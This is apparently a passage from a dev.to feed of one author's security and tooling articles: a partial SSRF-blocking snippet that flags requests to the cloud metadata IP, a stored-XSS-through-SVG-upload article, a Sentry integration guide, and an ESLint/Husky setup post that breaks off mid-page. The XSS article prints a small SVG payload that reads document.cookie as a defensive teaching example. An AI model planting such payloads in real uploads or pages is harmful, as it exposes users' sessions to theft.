class="k">from</span> <span class="dl">'</span><span class="s1">@sentry/node</span><span class="dl">'</span><span class="p">;</span> <span class="nx">page</span><span class="p">.</span><span class="nf">on</span><span class="p">(</span><span class="dl">'</span><span class="s1">request</span><span class="dl">'</span><span class="p">,</span> <span class="nx">req</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">if </span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nf">url</span><span class="p">().</span><span class="nf">includes</span><span class="p">(</span><span class="dl">'</span><span class="s1">169.254.169.254</span><span class="dl">'</span><span class="p">))</span> <span class="p">{</span> <span class="nx">Sentry</span><span class="p">.</span><span class="nf">captureMessage</span><span class="p">(</span><span class="s2">`SSRF ALERT: </span><span class="p">${</span><span class="nx">req</span><span class="p">.</span><span class="nf">url</span><span class="p">()}</span><span class="s2">`</span><span class="p">);</span> <span class="nx">req</span><span class="p">.</span><span class="nf">abort</span><span class="p">();</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="nx">req</span><span class="p">.</span><span class="k">continue</span><span class="p">();</span> <span class="p">}</span> <span class="p">});</span> </code></pre> </div> <h2> 🏆 Your Task </h2> <ul> <li>Implement request blocking</li> <li>Run webhook.site test</li> <li>Share results in comments!</li> </ul> <h2> 🙌 Follow for More </h2> <p>I'm writing more about: </p> <ul> <li> <strong>Frontend security</strong> for React/Next.js devs </li> <li> <strong>Real-world web exploit mitigation</strong> </li> <li> <strong>CSP, SSRF, XSS</strong>, and modern browser defences </li> </ul> <p>📌 <a href="https://www.linkedin.com/in/kreshpl/" rel="noopener noreferrer">Follow me here on LinkedIn</a> </p> webdev programming security nextjs 💥 How an SVG Can Break Your React /Next.js App and How to Defend It Vladimir Kukresh Mon, 28 Jul 2025 08:00:00 +0000 https://dev.to/kreshby/how-an-svg-can-break-your-react-nextjs-app-and-how-to-defend-it-1mmi https://dev.to/kreshby/how-an-svg-can-break-your-react-nextjs-app-and-how-to-defend-it-1mmi <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2xh3thmxnchtdrsyzmug.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2xh3thmxnchtdrsyzmug.png" alt="How an SVG Can Break Your React /Next.js App and How to Defend It" width="800" height="800"></a></p> <h2> 🧨 Real-World Scenario </h2> <p>You're building a profile page. A user uploads their avatar — maybe even in <code>.svg</code> format. Everything works smoothly. But then...</p> <ul> <li>Another user visits their profile.</li> <li>Their browser loads the avatar.</li> <li>Suddenly, <strong>JavaScript executes</strong> in the background.</li> <li>Session hijacked. CSRF triggered. Game over.</li> </ul> <p><strong>How?</strong><br><br> Because you let someone upload an SVG — and forgot how dangerous it can be.</p> <h2> 🕳️ What Is Stored XSS via File Upload? </h2> <p>Stored XSS happens when an attacker injects JavaScript into a system (e.g., via form or upload), and this code is <strong>stored on the server</strong> and later <strong>rendered in other users’ browsers</strong>.</p> <p><strong>With SVGs, it’s even sneakier:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight xml"><code><span class="nt">&lt;svg</span> <span class="na">xmlns=</span><span class="s">"http://www.w3.org/2000/svg"</span><span class="nt">&gt;</span> <span class="nt">&lt;script&gt;</span>alert(document.cookie)<span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/svg&gt;</span> </code></pre> </div> <p>If your backend doesn’t sanitize or serve this file safely, it will happily deliver this payload to unsuspecting users.</p> <h2> ⚛ Why React / Next.js Apps Are Not Immune </h2> <p>React protects you from XSS <em>inside JSX</em>, but <strong>not from files served by your backend</strong>.</p> <p>That means:</p> <ul> <li>If your API accepts and serves SVGs as-is, </li> <li>And you render them via <code>&lt;img src={user.avatarUrl} /&gt;</code>...</li> </ul> <p>You're <strong>trusting the browser</strong> not to execute embedded scripts. Bad idea.</p> <h2> 🔐 How to Prevent Stored XSS in Your React / Next.js App </h2> <h3> 1. ❌ Don't Allow SVG Uploads (Unless Absolutely Necessary) </h3> <p>SVGs support:</p> <ul> <li> <code>&lt;script&gt;</code>, <code>onload</code>, <code>onmouseover</code> </li> <li> <code>&lt;foreignObject&gt;</code> (HTML inside SVG)</li> <li>External scripts via <code>&lt;use xlink:href="..."&gt;</code> </li> </ul> <p>If you <strong>don’t sanitize</strong>, disallow them entirely.</p> <h3> 2. ✅ If You Allow SVGs, Serve Them Safely </h3> <p>Never render them inline. Always serve with headers like:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="err">Content-Type: image/svg+xml Content-Disposition: attachment; filename="avatar.svg" </span></code></pre> </div> <p>This tells the browser: <em>“Download this. Don’t render inline.”</em></p> <p>In Next.js (API route or middleware):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="nx">res</span><span class="p">.</span><span class="nf">setHeader</span><span class="p">(</span><span class="dl">'</span><span class="s1">Content-Disposition</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">attachment</span><span class="dl">'</span><span class="p">);</span> </code></pre> </div> <p>Or: Convert the SVG to PNG server-side and serve that instead.</p> <h3> 3. 🧽 Sanitize SVGs (If You Really Must) </h3> <p>Use tools like:</p> <ul> <li><a href="https://www.npmjs.com/package/@mattkrick/sanitize-svg" rel="noopener noreferrer"><code>sanitize-svg</code></a></li> <li> <a href="https://github.com/cure53/DOMPurify" rel="noopener noreferrer"><code>DOMPurify</code></a> (in server-side mode)</li> </ul> <blockquote> <p>⚠️ <strong>Never trust the file extension.</strong> Inspect and clean content.</p> </blockquote> <h3> 4. 🛡 Add a Strict Content Security Policy (CSP) </h3> <p>Add this via <code>next.config.js</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="nx">module</span><span class="p">.</span><span class="nx">exports</span> <span class="o">=</span> <span class="p">{</span> <span class="k">async</span> <span class="nf">headers</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="p">[</span> <span class="p">{</span> <span class="na">source</span><span class="p">:</span> <span class="dl">'</span><span class="s1">/(.*)</span><span class="dl">'</span><span class="p">,</span> <span class="na">headers</span><span class="p">:</span> <span class="p">[</span> <span class="p">{</span> <span class="na">key</span><span class="p">:</span> <span class="dl">'</span><span class="s1">Content-Security-Policy</span><span class="dl">'</span><span class="p">,</span> <span class="na">value</span><span class="p">:</span> <span class="s2">` default-src 'self'; script-src 'self'; img-src 'self' data:; object-src 'none'; base-uri 'none'; `</span><span class="p">.</span><span class="nf">replace</span><span class="p">(</span><span class="sr">/</span><span class="se">\s{2,}</span><span class="sr">/g</span><span class="p">,</span> <span class="dl">'</span><span class="s1"> </span><span class="dl">'</span><span class="p">).</span><span class="nf">trim</span><span class="p">(),</span> <span class="p">},</span> <span class="p">],</span> <span class="p">},</span> <span class="p">];</span> <span class="p">},</span> <span class="p">};</span> </code></pre> </div> <p>This prevents:</p> <ul> <li>Inline scripts,</li> <li>Loading SVGs via <code>&lt;object&gt;</code>,</li> <li>Abuse of <code>&lt;base&gt;</code> tags.</li> </ul> <h2> 🧠 Developer Checklist </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>✅</th> <th>What to Do</th> </tr> </thead> <tbody> <tr> <td>🔍</td> <td>Inspect file content, not just extensions</td> </tr> <tr> <td>📛</td> <td>Block dangerous MIME types or force download</td> </tr> <tr> <td>🧼</td> <td>Sanitize SVGs or disallow them</td> </tr> <tr> <td>🧱</td> <td>Add CSP headers</td> </tr> <tr> <td>🚫</td> <td>Never use <code>dangerouslySetInnerHTML</code> with user content</td> </tr> </tbody> </table></div> <h2> 🧵 TL;DR </h2> <p>SVGs aren’t "just images" — they’re <strong>XML with scripting capabilities</strong>.</p> <p>If you're not validating uploads and locking down how they're served, you're <strong>one SVG away from stored XSS</strong>.</p> <h2> 💬 Let’s Discuss </h2> <p>Have you dealt with SVG-related vulnerabilities in your frontend apps?<br><br> Do you allow SVGs in uploads, or ban them entirely?</p> <p>Drop your thoughts, horror stories, or tips in the comments 👇</p> <h2> 🙌 Follow for More </h2> <p>I'm writing more about:</p> <ul> <li>Frontend security for React/Next.js devs</li> <li>Real-world web exploit mitigation</li> <li>CSP, SSRF, XSS, and modern browser defences</li> </ul> <p>Follow me here on <a href="https://www.linkedin.com/in/kreshpl/" rel="noopener noreferrer">LinkedIn </a></p> webdev react xss appsec Integrating Error Monitoring and Performance Analysis with Sentry in a React Application Vladimir Kukresh Mon, 10 Feb 2025 21:57:31 +0000 https://dev.to/kreshby/integrating-error-monitoring-and-performance-analysis-with-sentry-in-a-react-application-51l0 https://dev.to/kreshby/integrating-error-monitoring-and-performance-analysis-with-sentry-in-a-react-application-51l0 <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7zb4i1704ori3z2vuyg9.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7zb4i1704ori3z2vuyg9.png" alt="Integrating Error Monitoring and Performance Analysis with Sentry in a React Application" width="800" height="449"></a></p> <h2> Introduction </h2> <p>In modern web development, building functional applications is only half the battle. Ensuring stability and performance is equally critical. Uncaught errors can degrade user experience and lead to lost customers. Sentry, a powerful error monitoring and performance analysis platform, helps developers detect and resolve issues swiftly. In this article, we’ll walk through integrating Sentry into a React application, covering advanced use cases and best practices to maximize its potential.</p> <h2> 1. Setting Up Sentry </h2> <h3> Step 1: Create a Sentry Project </h3> <ul> <li>Sign up at <a href="https://sentry.io" rel="noopener noreferrer">sentry.io</a> and create a new <strong>React</strong> project. </li> <li>Retrieve your <strong>DSN (Data Source Name)</strong>—a unique project identifier for client integration. Store this securely, preferably in environment variables (e.g., <code>.env</code>).</li> </ul> <h3> Step 2: Install Required Packages </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>npm <span class="nb">install</span> @sentry/react @sentry/tracing @sentry/webpack-plugin <span class="c"># Includes source map plugin</span> </code></pre> </div> <h2> 2. Initializing Sentry </h2> <p>Update your app’s entry file (e.g., <code>index.js</code> or <code>main.jsx</code> for React 18+):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="k">import</span> <span class="o">*</span> <span class="k">as</span> <span class="nx">Sentry</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">@sentry/react</span><span class="dl">'</span><span class="p">;</span> <span class="k">import</span> <span class="p">{</span> <span class="nx">BrowserTracing</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">@sentry/tracing</span><span class="dl">'</span><span class="p">;</span> <span class="k">import</span> <span class="p">{</span> <span class="nx">createRoot</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">react-dom/client</span><span class="dl">'</span><span class="p">;</span> <span class="nx">Sentry</span><span class="p">.</span><span class="nf">init</span><span class="p">({</span> <span class="na">dsn</span><span class="p">:</span> <span class="k">import</span><span class="p">.</span><span class="nx">meta</span><span class="p">.</span><span class="nx">env</span><span class="p">.</span><span class="nx">VITE_SENTRY_DSN</span><span class="p">,</span> <span class="c1">// Use environment variables (Vite example)</span> <span class="na">integrations</span><span class="p">:</span> <span class="p">[</span><span class="k">new</span> <span class="nc">BrowserTracing</span><span class="p">()],</span> <span class="na">tracesSampleRate</span><span class="p">:</span> <span class="mf">0.2</span><span class="p">,</span> <span class="c1">// Sample 20% of transactions for performance monitoring</span> <span class="na">environment</span><span class="p">:</span> <span class="nx">process</span><span class="p">.</span><span class="nx">env</span><span class="p">.</span><span class="nx">NODE_ENV</span><span class="p">,</span> <span class="c1">// 'development' or 'production'</span> <span class="na">release</span><span class="p">:</span> <span class="dl">'</span><span class="s1">my-app@1.0.0</span><span class="dl">'</span><span class="p">,</span> <span class="c1">// Track errors by version</span> <span class="na">ignoreErrors</span><span class="p">:</span> <span class="p">[</span><span class="dl">'</span><span class="s1">ResizeObserver loop limit exceeded</span><span class="dl">'</span><span class="p">],</span> <span class="c1">// Filter non-critical errors</span> <span class="nf">beforeSend</span><span class="p">(</span><span class="nx">event</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// Block errors from third-party services</span> <span class="k">if </span><span class="p">(</span><span class="nx">event</span><span class="p">.</span><span class="nx">request</span><span class="p">?.</span><span class="nx">url</span><span class="p">?.</span><span class="nf">includes</span><span class="p">(</span><span class="dl">'</span><span class="s1">adservice.com</span><span class="dl">'</span><span class="p">))</span> <span class="k">return</span> <span class="kc">null</span><span class="p">;</span> <span class="k">return</span> <span class="nx">event</span><span class="p">;</span> <span class="p">},</span> <span class="na">enableTracing</span><span class="p">:</span> <span class="nx">process</span><span class="p">.</span><span class="nx">env</span><span class="p">.</span><span class="nx">NODE_ENV</span> <span class="o">===</span> <span class="dl">'</span><span class="s1">production</span><span class="dl">'</span><span class="p">,</span> <span class="c1">// Disable tracing in dev mode</span> <span class="p">});</span> <span class="c1">// React 18+ setup</span> <span class="kd">const</span> <span class="nx">root</span> <span class="o">=</span> <span class="nf">createRoot</span><span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">'</span><span class="s1">root</span><span class="dl">'</span><span class="p">));</span> <span class="nx">root</span><span class="p">.</span><span class="nf">render</span><span class="p">(</span><span class="o">&lt;</span><span class="nx">App</span> <span class="o">/&gt;</span><span class="p">);</span> </code></pre> </div> <p><strong>Key Notes:</strong> </p> <ul> <li>Use <code>import.meta.env</code> (Vite) or <code>process.env</code> (Create React App) to manage secrets. </li> <li> <code>enableTracing</code> reduces overhead in development by disabling performance tracking. </li> </ul> <h2> 3. Error Handling </h2> <h3> Automatic Error Tracking </h3> <p>Sentry’s built-in <strong>Error Boundary</strong> captures React component errors. Add context for debugging:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="k">import</span> <span class="p">{</span> <span class="nx">ErrorBoundary</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">@sentry/react</span><span class="dl">'</span><span class="p">;</span> <span class="kd">function</span> <span class="nf">App</span><span class="p">()</span> <span class="p">{</span> <span class="k">return </span><span class="p">(</span> <span class="o">&lt;</span><span class="nx">ErrorBoundary</span> <span class="nx">fallback</span><span class="o">=</span><span class="p">{</span><span class="o">&lt;</span><span class="nx">ErrorScreen</span> <span class="o">/&gt;</span><span class="p">}</span> <span class="c1">// Custom error UI</span> <span class="nx">onError</span><span class="o">=</span><span class="p">{(</span><span class="nx">error</span><span class="p">,</span> <span class="nx">componentStack</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="nx">Sentry</span><span class="p">.</span><span class="nf">captureException</span><span class="p">(</span><span class="nx">error</span><span class="p">,</span> <span class="p">{</span> <span class="na">contexts</span><span class="p">:</span> <span class="p">{</span> <span class="na">react</span><span class="p">:</span> <span class="p">{</span> <span class="nx">componentStack</span> <span class="p">}</span> <span class="p">},</span> <span class="c1">// Include component trace</span> <span class="na">tags</span><span class="p">:</span> <span class="p">{</span> <span class="na">section</span><span class="p">:</span> <span class="dl">"</span><span class="s2">checkout-page</span><span class="dl">"</span> <span class="p">},</span> <span class="c1">// Tag errors by feature</span> <span class="p">});</span> <span class="p">}}</span> <span class="o">&gt;</span> <span class="o">&lt;</span><span class="nx">YourApp</span> <span class="o">/&gt;</span> <span class="o">&lt;</span><span class="sr">/ErrorBoundary</span><span class="err">&gt; </span> <span class="p">);</span> <span class="p">}</span> </code></pre> </div> <h3> Manual Error Capture </h3> <p>Track API failures or async operations:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="kd">const</span> <span class="nx">fetchUserData</span> <span class="o">=</span> <span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">try</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">response</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">axios</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="dl">'</span><span class="s1">/api/user</span><span class="dl">'</span><span class="p">);</span> <span class="p">}</span> <span class="k">catch </span><span class="p">(</span><span class="nx">error</span><span class="p">)</span> <span class="p">{</span> <span class="nx">Sentry</span><span class="p">.</span><span class="nf">captureException</span><span class="p">(</span><span class="nx">error</span><span class="p">,</span> <span class="p">{</span> <span class="na">extra</span><span class="p">:</span> <span class="p">{</span> <span class="na">endpoint</span><span class="p">:</span> <span class="dl">'</span><span class="s1">/api/user</span><span class="dl">'</span> <span class="p">},</span> <span class="c1">// Add request context</span> <span class="na">user</span><span class="p">:</span> <span class="p">{</span> <span class="na">id</span><span class="p">:</span> <span class="dl">'</span><span class="s1">123</span><span class="dl">'</span> <span class="p">},</span> <span class="c1">// Associate errors with users</span> <span class="p">});</span> <span class="p">}</span> <span class="p">};</span> </code></pre> </div> <h2> 4. Advanced Integrations </h2> <h3> React Router v6 Support </h3> <p>For modern routing:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="k">import</span> <span class="p">{</span> <span class="nx">createBrowserRouter</span><span class="p">,</span> <span class="nx">RouterProvider</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">react-router-dom</span><span class="dl">'</span><span class="p">;</span> <span class="k">import</span> <span class="p">{</span> <span class="nx">reactRouterV6Instrumentation</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">@sentry/react</span><span class="dl">'</span><span class="p">;</span> <span class="kd">const</span> <span class="nx">router</span> <span class="o">=</span> <span class="nf">createBrowserRouter</span><span class="p">([...</span><span class="nx">routes</span><span class="p">]);</span> <span class="nx">Sentry</span><span class="p">.</span><span class="nf">init</span><span class="p">({</span> <span class="na">integrations</span><span class="p">:</span> <span class="p">[</span> <span class="k">new</span> <span class="nc">BrowserTracing</span><span class="p">({</span> <span class="na">routingInstrumentation</span><span class="p">:</span> <span class="nf">reactRouterV6Instrumentation</span><span class="p">(</span> <span class="nx">router</span><span class="p">,</span> <span class="nx">router</span><span class="p">.</span><span class="nx">state</span><span class="p">.</span><span class="nx">location</span><span class="p">,</span> <span class="nx">router</span><span class="p">.</span><span class="nx">state</span><span class="p">.</span><span class="nx">navigation</span> <span class="p">),</span> <span class="na">tracingOrigins</span><span class="p">:</span> <span class="p">[</span><span class="dl">'</span><span class="s1">api.yourservice.com</span><span class="dl">'</span><span class="p">],</span> <span class="c1">// Trace API requests</span> <span class="p">}),</span> <span class="p">],</span> <span class="p">});</span> </code></pre> </div> <h3> Redux Toolkit Integration </h3> <p>Monitor state changes in Redux:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="k">import</span> <span class="p">{</span> <span class="nx">configureStore</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">@reduxjs/toolkit</span><span class="dl">'</span><span class="p">;</span> <span class="k">import</span> <span class="p">{</span> <span class="nx">sentryReduxEnhancer</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">@sentry/react</span><span class="dl">'</span><span class="p">;</span> <span class="kd">const</span> <span class="nx">store</span> <span class="o">=</span> <span class="nf">configureStore</span><span class="p">({</span> <span class="na">reducer</span><span class="p">:</span> <span class="nx">rootReducer</span><span class="p">,</span> <span class="na">enhancers</span><span class="p">:</span> <span class="p">[</span><span class="nf">sentryReduxEnhancer</span><span class="p">()],</span> <span class="c1">// Logs actions and state on errors</span> <span class="p">});</span> </code></pre> </div> <h2> 5. Performance Monitoring </h2> <h3> Component Rendering Profiling </h3> <p>Identify slow components with Sentry’s profiler:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="k">import</span> <span class="p">{</span> <span class="nx">withProfiler</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">@sentry/react</span><span class="dl">'</span><span class="p">;</span> <span class="kd">const</span> <span class="nx">Dashboard</span> <span class="o">=</span> <span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="p">...</span> <span class="p">};</span> <span class="k">export</span> <span class="k">default</span> <span class="nf">withProfiler</span><span class="p">(</span><span class="nx">Dashboard</span><span class="p">,</span> <span class="p">{</span> <span class="na">name</span><span class="p">:</span> <span class="dl">"</span><span class="s2">DashboardPage</span><span class="dl">"</span> <span class="p">});</span> </code></pre> </div> <h3> Custom Transactions </h3> <p>Measure critical operations:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="kd">const</span> <span class="nx">processImageUpload</span> <span class="o">=</span> <span class="k">async </span><span class="p">(</span><span class="nx">file</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">transaction</span> <span class="o">=</span> <span class="nx">Sentry</span><span class="p">.</span><span class="nf">startTransaction</span><span class="p">({</span> <span class="na">name</span><span class="p">:</span> <span class="dl">"</span><span class="s2">ImageUpload</span><span class="dl">"</span> <span class="p">});</span> <span class="k">try</span> <span class="p">{</span> <span class="k">await</span> <span class="nf">uploadToCloud</span><span class="p">(</span><span class="nx">file</span><span class="p">);</span> <span class="nx">transaction</span><span class="p">.</span><span class="nf">finish</span><span class="p">();</span> <span class="p">}</span> <span class="k">catch </span><span class="p">(</span><span class="nx">error</span><span class="p">)</span> <span class="p">{</span> <span class="nx">transaction</span><span class="p">.</span><span class="nf">setStatus</span><span class="p">(</span><span class="dl">'</span><span class="s1">failed</span><span class="dl">'</span><span class="p">);</span> <span class="nx">transaction</span><span class="p">.</span><span class="nf">finish</span><span class="p">();</span> <span class="nx">Sentry</span><span class="p">.</span><span class="nf">captureException</span><span class="p">(</span><span class="nx">error</span><span class="p">);</span> <span class="p">}</span> <span class="p">};</span> </code></pre> </div> <h2> 6. Best Practices </h2> <h3> Source Maps for Debugging </h3> <p>Upload source maps during builds using <code>@sentry/webpack-plugin</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// webpack.config.js</span> <span class="kd">const</span> <span class="nx">SentryPlugin</span> <span class="o">=</span> <span class="nf">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">@sentry/webpack-plugin</span><span class="dl">'</span><span class="p">);</span> <span class="nx">module</span><span class="p">.</span><span class="nx">exports</span> <span class="o">=</span> <span class="p">{</span> <span class="na">plugins</span><span class="p">:</span> <span class="p">[</span> <span class="k">new</span> <span class="nc">SentryPlugin</span><span class="p">({</span> <span class="na">authToken</span><span class="p">:</span> <span class="nx">process</span><span class="p">.</span><span class="nx">env</span><span class="p">.</span><span class="nx">SENTRY_AUTH_TOKEN</span><span class="p">,</span> <span class="na">org</span><span class="p">:</span> <span class="dl">'</span><span class="s1">your-org</span><span class="dl">'</span><span class="p">,</span> <span class="na">project</span><span class="p">:</span> <span class="dl">'</span><span class="s1">your-project</span><span class="dl">'</span><span class="p">,</span> <span class="na">include</span><span class="p">:</span> <span class="dl">'</span><span class="s1">./dist</span><span class="dl">'</span><span class="p">,</span> <span class="na">release</span><span class="p">:</span> <span class="dl">'</span><span class="s1">my-app@1.0.0</span><span class="dl">'</span><span class="p">,</span> <span class="p">}),</span> <span class="p">],</span> <span class="p">};</span> </code></pre> </div> <h3> Alerting and Notifications </h3> <p>Configure Slack alerts: </p> <ol> <li>In Sentry: <strong>Project Settings → Integrations → Slack</strong>. </li> <li>Choose events to monitor (e.g., "New Errors" or "Performance Issues"). </li> </ol> <h3> Release Tracking with CI/CD </h3> <p>Automate release tagging using GitHub Actions:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Create Sentry Release</span> <span class="na">uses</span><span class="pi">:</span> <span class="s">getsentry/action-release@v1</span> <span class="na">env</span><span class="pi">:</span> <span class="na">SENTRY_AUTH_TOKEN</span><span class="pi">:</span> <span class="s">${{ secrets.SENTRY_AUTH_TOKEN }}</span> <span class="na">with</span><span class="pi">:</span> <span class="na">environment</span><span class="pi">:</span> <span class="s">production</span> <span class="na">version</span><span class="pi">:</span> <span class="s">${{ github.sha }} // Link releases to Git commits</span> </code></pre> </div> <h2> Conclusion </h2> <p>Integrating Sentry into your React application transforms how you handle errors and optimize performance. By leveraging automatic error boundaries, advanced tracing, and integrations with tools like React Router and Redux, you gain deep insights into your app’s health. Follow best practices like source map uploads and CI/CD automation to streamline debugging and accelerate issue resolution. </p> <p><strong>Next Steps:</strong> </p> <ul> <li>Explore <a href="https://docs.sentry.io/platforms/javascript/guides/react/" rel="noopener noreferrer">Sentry’s React documentation</a>. </li> <li>Implement custom metrics (e.g., key user journey timings). </li> <li>Set up dashboards to visualize error trends and performance bottlenecks. </li> </ul> <p>With Sentry, you’re not just fixing bugs—you’re building a more resilient and user-friendly application.</p> Keep your code clean with ESLint, prettier, pre-commit and pre-push hooks using husky, lint-staged, and pretty-quick Vladimir Kukresh Sun, 12 Feb 2023 19:58:53 +0000 https://dev.to/kreshby/keep-your-code-clean-with-eslint-prettier-pre-commit-and-pre-push-hooks-using-husky-lint-staged-and-pretty-quick-4fka https://dev.to/kreshby/keep-your-code-clean-with-eslint-prettier-pre-commit-and-pre-push-hooks-using-husky-lint-staged-and-pretty-quick-4fka <h3> Keeping your code clean and consistent is important in any software development project. </h3> <p>This is especially true for React apps, where code can become complex and difficult to maintain over time. One way to ensure that your code is clean and consistent is to use a set of tools that automate the process of checking and fixing code.</p> <p>In this post, we will look at how to use <code>ESLint</code>, <code>Prettier</code>, <code>pre-commit</code>, and <code>pre-push hooks</code> in a React app using <code>Husky</code>, <code>lint-staged</code>, and <code>pretty-quick</code>. These tools will help you maintain code quality and consistency throughout your development process.</p> <p>First, let's start by installing the required packages. Run the following command in your terminal:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>npm install eslint prettier husky lint-staged pretty-quick --save-dev </code></pre> </div> <p>Next, you need to configure <strong>ESLint</strong> and <strong>Prettier</strong>. You can either create a <code>.eslintrc</code> and <code>.prettierrc</code> file in the root of your project or use the default configuration by running the following command:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>npx eslint --init npx prettier --write . </code></pre> </div> <p>Now, it's time to set up <code>Husky</code> and <code>lint-staged</code>.<br> Pre-commit and pre-push hooks are used to run scripts before you commit changes to your Git repository or before you push changes to a remote repository. You can use husky, lint-staged, and pretty-quick to configure these hooks in your project.</p> <p>To set up <code>Husky</code> and <code>lint-staged</code>, you'll add the following code to your package.json file:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>"husky": { "hooks": { "pre-commit": "lint-staged", "pre-push": "npm test" } }, "lint-staged": { "*.{js,jsx}": [ "pretty-quick --staged", "eslint --fix", "git add" ] } </code></pre> </div> <p>This configuration runs lint-staged on the pre-commit hook and npm test on the pre-push hook. Lint-staged runs Prettier and ESLint on all staged .js and .jsx files and fixes any issues. This way, every time you run git commit, lint-staged will run pretty-quick to format your code and eslint to fix any linting errors. And, every time you run git push, npm test will run to make sure your code passes all tests.</p> <p>The following is an example of what your <code>package.json</code> file might look like after setting up the tools and hooks:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>{ "name": "your-project-name", "version": "1.0.0", "scripts": { "lint": "eslint src", "test": "jest" }, "dependencies": { "react": "^17.0.1", "react-dom": "^17.0.1" }, "devDependencies": { "eslint": "^7.16.0", "eslint-config-airbnb": "^18.2.0", "eslint-plugin-import": "^2.22.0", "eslint-plugin-jsx-a11y": "^6.4.1", "eslint-plugin-react": "^7.22.0", "husky": "^4.3.0", "lint-staged": "^11.0.0", "prettier": "^2.1.2", "pretty-quick": "^3.0.2" }, "husky": { "hooks": { "pre-commit": "lint-staged", "pre-push": "npm test" } }, "lint-staged": { "src/**/*.{js,jsx}": [ "pretty-quick --staged", "eslint --fix" ] } } </code></pre> </div> <p>Additionally, by using pre-commit and pre-push hooks, you can ensure that only well-formed and error-free code is committed to your repository and pushed to the remote server. This helps to avoid conflicts with other team members, as well as ensures that the code is always up-to-date and easy to maintain.</p> <p>It's also important to note that these tools are customizable, and you can fine-tune the configuration to fit your specific needs and preferences. You can adjust the rules used by ESLint and Prettier, as well as the scripts run by the pre-commit and pre-push hooks, to suit your project's requirements.</p> <p>In summary, using a set of tools like ESLint, Prettier, pre-commit, and pre-push hooks can greatly improve the quality and maintainability of your React code. By automating the process of checking and fixing code, you can focus on the more important aspects of your project and avoid potential roadblocks down the line</p> <p>Links:<br> </p> <div class="crayons-card c-embed text-styles text-styles--secondary"> <div class="c-embed__content"> <div class="c-embed__cover"> <a href="https://www.npmjs.com/package/pretty-quick" class="c-link align-middle" rel="noopener noreferrer"> <img alt="" src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fstatic-production.npmjs.com%2F338e4905a2684ca96e08c7780fc68412.png" height="420" class="m-0" width="800"> </a> </div> <div class="c-embed__body"> <h2 class="fs-xl lh-tight"> <a href="https://www.npmjs.com/package/pretty-quick" rel="noopener noreferrer" class="c-link"> pretty-quick - npm </a> </h2> <p class="truncate-at-3"> Get Pretty Quick. Latest version: 4.2.2, last published: 3 months ago. Start using pretty-quick in your project by running `npm i pretty-quick`. There are 233 other projects in the npm registry using pretty-quick. </p> <div class="color-secondary fs-s flex items-center"> <img alt="favicon" 